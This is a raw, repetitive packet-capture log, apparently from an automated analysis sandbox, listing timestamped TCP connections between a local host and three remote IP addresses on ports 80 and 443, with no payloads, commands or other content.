                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.359323978 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.359770060 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.359954119 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.359993935 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.360658884 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.360797882 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.360836029 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.361589909 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.361881018 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.361922979 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.362442017 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.362653971 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.363298893 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.363348961 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.363439083 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.364262104 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.364304066 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.364442110 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.365153074 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.365201950 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.365454912 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.365983963 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.365986109 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.366101980 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.366144896 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.366842031 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.370501995 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.370567083 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.370575905 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.370615005 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.378621101 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.378700018 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.378707886 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.378798962 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.384411097 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.384500027 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.384505987 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.384814024 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.391820908 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.391911030 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.391916990 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.391961098 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.398339033 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.398408890 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.398416996 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.398483038 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.404015064 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.404087067 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.404105902 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.406066895 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.409838915 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.409929991 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.409950018 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.414479971 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.417293072 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.417381048 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.417393923 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.417540073 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.429377079 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.429449081 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.429461002 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.429528952 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.506203890 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.519258976 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.519335032 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.519361019 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.519404888 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.523929119 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.524005890 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.524012089 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.524651051 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.528548956 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.528625011 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.528633118 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.528676033 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.534346104 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.534408092 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.534415007 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.534452915 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.538537979 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.538614035 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.538619995 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.538661003 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.542654037 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.542716980 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.542723894 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.542767048 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.547780037 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.547840118 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.547847033 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.548089027 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.551151991 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.551211119 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.551217079 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.551310062 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.553985119 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.554045916 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.554055929 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.554091930 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.557265997 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.557323933 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.557329893 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.557426929 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.561012983 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.561079025 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.561084986 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.561997890 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.563895941 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.563962936 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.563973904 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.564480066 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.566725969 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.566788912 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.566795111 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.567404032 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.570461988 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.570534945 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.570544958 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.570594072 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.573331118 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.573398113 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.573405027 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.574136972 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639254093 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639348030 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639383078 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639403105 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639414072 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639421940 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639450073 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639475107 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639496088 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.639527082 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.646737099 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.709768057 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.709842920 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.709860086 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.709995985 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.712161064 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.712215900 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.712222099 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.712280035 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.716526985 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.716603041 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.716609001 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.716649055 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.719206095 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.719302893 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.719310045 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.719583035 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.721782923 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.721848965 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.721857071 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.721987009 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.726298094 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.726376057 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.726383924 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.726705074 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.728868008 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.728931904 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.728940010 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.729120016 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.731462002 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.731519938 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.731525898 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.731631041 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.734771967 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.734838009 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.734843969 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.734884977 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.737585068 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.737641096 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.737646103 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.737677097 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.740895033 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.741002083 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.741014004 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.741048098 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.743876934 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.743937969 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.743948936 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.743987083 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.747486115 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.747556925 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.747566938 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.747612953 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.750469923 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.750538111 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.750544071 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.750674963 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.753298044 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.753364086 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.753370047 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.753405094 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.756989002 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.757097960 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.757105112 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.757668018 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.778450966 CET49820443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.778502941 CET4434982020.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.778578043 CET49820443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.779289961 CET49820443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.779320002 CET4434982020.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.818649054 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.818741083 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.818757057 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.818773031 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.818803072 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.818824053 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.839072943 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.865104914 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.865135908 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.865190029 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.865222931 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.865241051 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.865269899 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.901606083 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.901674032 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.901694059 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.901870966 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.904112101 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.904166937 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.904191017 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.904251099 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.907711983 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.907783031 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.907797098 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.907845020 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.910538912 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.910605907 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.910613060 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.911062956 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.913491011 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.913548946 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.913572073 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.914073944 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.917318106 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.917383909 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.917402029 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.918108940 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.920156002 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.920212984 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.920237064 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.920272112 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.923007965 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.923060894 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.923074961 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.923223972 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.925767899 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.925842047 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.925852060 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.925898075 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.939640999 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.939672947 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.989367008 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.989425898 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.989454985 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.989483118 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.989517927 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.989530087 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.013525963 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.013544083 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.013596058 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.013617992 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.013638020 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.013662100 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.038853884 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.038908958 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.038940907 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.038952112 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.038985968 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.039010048 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.058507919 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.058547974 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.058571100 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.058598995 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:26.058619022 CET49812443192.168.2.6150.171.28.10
